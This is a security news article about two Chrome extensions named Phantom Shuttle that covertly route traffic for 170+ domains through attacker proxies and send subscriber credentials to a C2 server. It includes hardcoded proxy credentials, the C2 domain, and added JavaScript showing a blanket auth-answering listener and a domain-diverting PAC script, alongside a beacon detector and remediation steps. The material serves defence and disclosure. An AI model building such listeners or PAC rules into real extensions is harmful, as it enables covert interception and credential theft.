Malicious Chrome Extensions ‘Phantom Shuttle’ Compromise User Credentials Across 170+ Sites
Two Chrome extensions, both named Phantom Shuttle, have been identified as malicious tools that reroute user traffic through attacker-controlled proxies and expose credentials on over 170 websites. Both masqueraded as network speed test tools and were available on the Chrome Web Store, one since 2017 and the other since April 2023.
Details of the Malicious Extensions:
– Phantom Shuttle (ID: fbfldogmkadejddihifklefknmikncaj): Published on November 26, 2017, this extension has amassed approximately 2,000 users.
– Phantom Shuttle (ID: ocpcmfmiidofonkbodpdhgddhlcmcofd): Released on April 27, 2023, it has around 180 users.
Both extensions are promoted as multi-location network speed test plug-ins for developers and foreign trade professionals. Users are enticed to subscribe to VIP tiers, at ¥9.9 to ¥95.9 CNY (about $1.40 to $13.50 USD), under the pretense of unlocking legitimate VPN functionality.
Malicious Operations Unveiled:
Once a user subscribes, the extensions activate a "smarty" proxy mode that reroutes traffic for over 170 specified domains through servers controlled by the attackers. Those proxies sit in a man-in-the-middle position: plain HTTP traffic passes through them in the clear, and for HTTPS they see which hosts the user connects to and can block, redirect, or tamper with connections. (Reading the contents of HTTPS sessions would additionally require TLS interception, which the analysis does not describe.) Data gathered at the proxies, together with the subscriber details covered below, is sent to a command-and-control (C2) server.
To maintain the illusion of legitimacy, the extensions really do run latency tests against the proxy servers and display connection status, while the rerouting happens covertly in the background.
Technical Mechanisms of the Attack:
The malicious code is embedded in two JavaScript files bundled with the extensions, `jquery-1.12.2.min.js` (a modified copy of jQuery) and `scripts.js`. It registers a blocking listener on `chrome.webRequest.onAuthRequired` that answers every HTTP authentication challenge, on any website, with a hardcoded proxy credential pair (`topfany / 963852wei`). Because the listener's response is consumed before Chrome would display a credential prompt, the user never sees that a proxy has challenged the browser. The listener does not distinguish proxy challenges (HTTP 407) from origin-server challenges (HTTP 401), so the same credentials are also handed to any site that requests HTTP authentication.
The auth listener supplies credentials whenever one of the proxies challenges a request; which requests reach a proxy at all is decided by a Proxy Auto-Configuration (PAC) script that the extensions install through Chrome's proxy settings, with three modes:
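The listener pattern described above, as an added example that is not the extension's own code: a minimal stub of `chrome.webRequest.onAuthRequired` (constructed so the logic runs under Node) dispatches a constructed proxy challenge and a constructed origin-server challenge to two handlers. The first answers everything, as the report describes; the second checks the real `details.isProxy` and `details.challenger` fields before answering. Credential values and the host `proxy.example` are placeholders. In Manifest V2 a blocking `onAuthRequired` listener needs the `webRequestBlocking` permission; in Manifest V3 the equivalent is `webRequestAuthProvider` with the `"asyncBlocking"` option.

```javascript
// Added example: how a chrome.webRequest.onAuthRequired listener silently answers
// authentication challenges, and why answering every challenge leaks the proxy
// credentials to ordinary websites. Not the extension's code; the `chrome` stub
// below is a constructed stand-in for the small part of the API that is used.

const chrome = {
  webRequest: {
    onAuthRequired: {
      listeners: [],
      addListener(fn, filter, extraInfo) {
        this.listeners.push({ fn, filter, extraInfo });
      },
      // Deliver a challenge the way the browser would: each listener gets the
      // request details and the first blocking response with credentials wins.
      dispatch(details) {
        for (const { fn } of this.listeners) {
          const res = fn(details);
          if (res && res.authCredentials) return res;
        }
        return {};
      },
    },
  },
};

// Placeholder values standing in for the hard-coded proxy credentials (assumed).
const PROXY_CREDS = { username: "proxy-user", password: "proxy-pass" };

// Pattern from the report: every challenge gets the same credentials, so the
// user never sees Chrome's credential prompt for any site or proxy.
function answerEveryChallenge(details) {
  return { authCredentials: PROXY_CREDS };
}

// Tighter variant: only answer proxy (407) challenges from the expected proxy
// host, never origin-server (401) challenges. `isProxy` and `challenger`
// are real fields of the onAuthRequired details object.
function answerProxyOnly(details) {
  if (details.isProxy && details.challenger.host === "proxy.example") {
    return { authCredentials: PROXY_CREDS };
  }
  return {}; // fall through: Chrome shows its normal prompt
}

// Register one handler, feed it a constructed proxy challenge and a constructed
// origin challenge, and report which of the two received the credentials.
function simulate(handler) {
  chrome.webRequest.onAuthRequired.listeners = [];
  chrome.webRequest.onAuthRequired.addListener(handler, { urls: ["<all_urls>"] }, ["blocking"]);
  const proxyChallenge = {
    url: "https://github.com/", isProxy: true, statusCode: 407,
    challenger: { host: "proxy.example", port: 8080 },
  };
  const originChallenge = {
    url: "https://intranet.example/api", isProxy: false, statusCode: 401,
    challenger: { host: "intranet.example", port: 443 },
  };
  const api = chrome.webRequest.onAuthRequired;
  return {
    proxyGotCreds: Boolean(api.dispatch(proxyChallenge).authCredentials),
    originGotCreds: Boolean(api.dispatch(originChallenge).authCredentials),
  };
}

console.log("answer everything:", simulate(answerEveryChallenge));
console.log("proxy only:       ", simulate(answerProxyOnly));
```

Running it shows the difference: the indiscriminate handler hands the proxy password to the origin server's 401 as well, which is exactly why a listener of this shape is a red flag when reviewing an extension's code.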
1. Close: Disables the proxy feature.
2. Always: Routes all web traffic through the proxy.
3. Smarty: Routes traffic from a predefined list of over 170 high-value domains through the proxy.
The targeted domains span developer sites (GitHub, Stack Overflow, Docker), cloud services (Amazon Web Services, DigitalOcean, Microsoft Azure), enterprise vendors (Cisco, IBM, VMware), social media platforms (Facebook, Instagram, Twitter), and adult content sites. The inclusion of adult sites suggests that the collected browsing data could also be used to blackmail victims.
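The three PAC modes above, as an added example written for this page rather than taken from the extensions: `buildPac` emits a PAC script for one mode, `resolve` evaluates it for a URL the way a proxy resolver would, and `proxiedHosts` is the defender-side check, listing which hosts a captured PAC script would divert. The domain list and `proxy.example:8080` are constructed placeholders for the real 170+ domains and the attacker proxies.

```javascript
// Added example (not the extension's own code): a Proxy Auto-Configuration (PAC)
// script implementing the "close", "always" and "smarty" modes, plus a small
// evaluator so it can be exercised under Node without a browser.

// Constructed stand-ins for the real target list and the attacker-controlled proxy.
const TARGET_DOMAINS = ["github.com", "stackoverflow.com", "amazonaws.com", "portal.azure.com"];
const PROXY = "PROXY proxy.example:8080";

// Build the PAC source for one mode. In an extension this string is what would be
// passed to chrome.proxy.settings.set({ value: { mode: "pac_script",
// pacScript: { data: <source> } }, scope: "regular" }).
function buildPac(mode) {
  return `
    var MODE = ${JSON.stringify(mode)};
    var PROXY = ${JSON.stringify(PROXY)};
    var TARGETS = ${JSON.stringify(TARGET_DOMAINS)};
    function FindProxyForURL(url, host) {
      if (MODE === "close") return "DIRECT";   // proxy feature off
      if (MODE === "always") return PROXY;     // all traffic via the proxy
      // "smarty": only the listed domains and their subdomains go via the proxy.
      for (var i = 0; i < TARGETS.length; i++) {
        var d = TARGETS[i];
        if (host === d || host.slice(-(d.length + 1)) === "." + d) return PROXY;
      }
      return "DIRECT";
    }`;
}

// Load the PAC text the way a resolver would and ask it where one URL goes.
function resolve(mode, url) {
  const findProxyForURL = new Function(buildPac(mode) + "\nreturn FindProxyForURL;")();
  return findProxyForURL(url, new URL(url).hostname);
}

// Defender-side helper: given any PAC source (e.g. pulled from an extension's
// storage or from chrome://net-internals/#proxy), report which of a set of
// hosts it would send somewhere other than DIRECT.
function proxiedHosts(pacSource, hosts) {
  const findProxyForURL = new Function(pacSource + "\nreturn FindProxyForURL;")();
  return hosts.filter(h => findProxyForURL("https://" + h + "/", h) !== "DIRECT");
}

for (const mode of ["close", "always", "smarty"]) {
  console.log(mode, resolve(mode, "https://api.github.com/repos"), resolve(mode, "https://example.org/"));
}
console.log(proxiedHosts(buildPac("smarty"), ["github.com", "example.org", "s3.amazonaws.com"]));
```

The suffix check is written out explicitly rather than with the PAC helper `dnsDomainIs`, because that helper only tests that the host ends with the string and would also match `notgithub.com`; the explicit form requires a dot boundary.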
Continuous Data Exfiltration:
The extensions also send a heartbeat to their C2 server at `phantomshuttle[.]space` every 60 seconds, reporting VIP users' email addresses, plaintext passwords, and the extension version. The heartbeat keeps the operators informed of which subscribers are active; it is the proxy position that lets them capture traffic, manipulate responses, and inject arbitrary content into the pages those users load, effectively giving them a comprehensive view of the victims' activity on the targeted domains.
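A fixed 60-second cadence is easy to spot in outbound connection logs. The detector below is an added example, not part of the original analysis; the log lines are constructed, and the `epoch_seconds src_host dst_host` format is an assumption standing in for whatever proxy, DNS or NetFlow export is available. It groups connections per source and destination, computes the gaps between consecutive connections, and flags pairs whose gaps cluster tightly around one period.

```javascript
// Added example: flagging periodic beaconing (such as a 60 s heartbeat) in
// connection logs. Not from the report; log lines and format are constructed.

// Constructed sample log: one workstation beaconing every ~60 s to the C2 domain
// and, for contrast, irregular browsing to github.com.
const SAMPLE_LOG = `
1700000000 ws-17 phantomshuttle.space
1700000060 ws-17 phantomshuttle.space
1700000120 ws-17 phantomshuttle.space
1700000181 ws-17 phantomshuttle.space
1700000240 ws-17 phantomshuttle.space
1700000300 ws-17 phantomshuttle.space
1700000005 ws-17 github.com
1700000047 ws-17 github.com
1700000190 ws-17 github.com
1700000199 ws-17 github.com
1700000290 ws-17 github.com
1700000301 ws-17 github.com
`;

// Parse "epoch_seconds src dst" lines into objects.
function parseLog(text) {
  return text.trim().split("\n").map(line => {
    const [t, src, dst] = line.trim().split(/\s+/);
    return { t: Number(t), src, dst };
  });
}

// For each (src, dst) pair with at least `minCount` connections, take the median
// gap between consecutive connections and the fraction of gaps within
// `tolerance` seconds of that median. Pairs at or above `minRegular` are beacons.
function findBeacons(entries, { minCount = 5, tolerance = 3, minRegular = 0.8 } = {}) {
  const groups = new Map();
  for (const e of entries) {
    const key = `${e.src}>${e.dst}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(e.t);
  }
  const beacons = [];
  for (const [pair, times] of groups) {
    if (times.length < minCount) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => t - times[i]);
    const sorted = [...gaps].sort((a, b) => a - b);
    const median = sorted[Math.floor(sorted.length / 2)];
    const regular = gaps.filter(g => Math.abs(g - median) <= tolerance).length / gaps.length;
    if (regular >= minRegular) beacons.push({ pair, period: median, regular, count: times.length });
  }
  return beacons;
}

console.log(findBeacons(parseLog(SAMPLE_LOG)));
```

The tolerance absorbs small jitter (a beacon that fires a second late because the browser was busy), while the regularity threshold keeps bursty human browsing, whose gaps vary wildly, from being flagged. On real data, also exclude known-good periodic destinations such as update and telemetry servers before reviewing what remains.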
Broader Implications and Historical Context:
This incident is part of a larger pattern of malicious Chrome extensions compromising user security. For instance, in December 2025, a campaign attributed to the threat actor ShadyPanda turned browser extensions with over 4.3 million combined installations into spyware that monitored website visits, exfiltrated browsing histories, and collected detailed browser fingerprints. ([thehackernews.com](https://thehackernews.com/2025/12/shadypanda-turns-popular-browser.html?utm_source=openai))
Similarly, in December 2024, a campaign compromised at least 35 known Chrome extensions, exposing over 2.6 million users to data theft and credential theft. ([thehackernews.com](https://thehackernews.com/2024/12/16-chrome-extensions-hacked-exposing.html?utm_source=openai))
Recommendations for Users:
Users who have installed either of the Phantom Shuttle extensions are strongly advised to:
– Uninstall the Extensions Immediately: Remove both extensions from Chrome to stop the traffic rerouting, then confirm that the browser's proxy configuration no longer points at a PAC script (chrome://net-internals/#proxy shows the effective settings).
– Change All Passwords and Rotate Tokens: Update passwords for all accounts, starting with those on the targeted domains. For developer and cloud services such as GitHub and AWS, also rotate API keys, access tokens, and SSH keys and sign out of all active sessions, since a proxy in the traffic path may have captured session cookies as well as passwords. If the password used for the extension's VIP account is reused anywhere, change it there too; it was sent to the C2 server in plaintext.
– Monitor Account Activity: Regularly check for unauthorized access or unusual activities in your accounts.
– Exercise Caution with Extensions: Be vigilant when installing browser extensions. Verify the credibility of the developer and read user reviews before installation.
Conclusion:
The discovery of the Phantom Shuttle extensions underscores the critical need for users to exercise caution when installing browser add-ons. Cybercriminals continue to exploit trusted platforms to distribute malicious software, emphasizing the importance of proactive security measures and user awareness in safeguarding personal information.